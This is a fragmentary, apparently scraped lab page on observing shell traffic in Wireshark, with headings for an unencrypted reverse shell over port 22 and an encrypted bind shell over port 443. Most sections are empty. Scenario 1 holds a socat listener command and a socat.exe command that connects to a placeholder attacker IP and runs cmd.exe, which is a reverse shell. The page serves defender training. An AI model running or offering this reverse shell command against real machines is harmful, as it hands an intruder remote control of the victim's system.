Wireshark and Encrypted Traffic
Scenario 1: Unencrypted Reverse Shell over Port 22
Objective:
Commands:
socat -d -d TCP-LISTEN:22 STDOUTsocat.exe TCP:<attacker-ip>:22 EXEC:'cmd.exe',pipesDefender's View (Wireshark):

Scenario 2: Encrypted Bind Shell over Port 443
Objective:
Generate a Self-signed Certificate:
Commands:
Defender's View (Wireshark):

Practicals


Last updated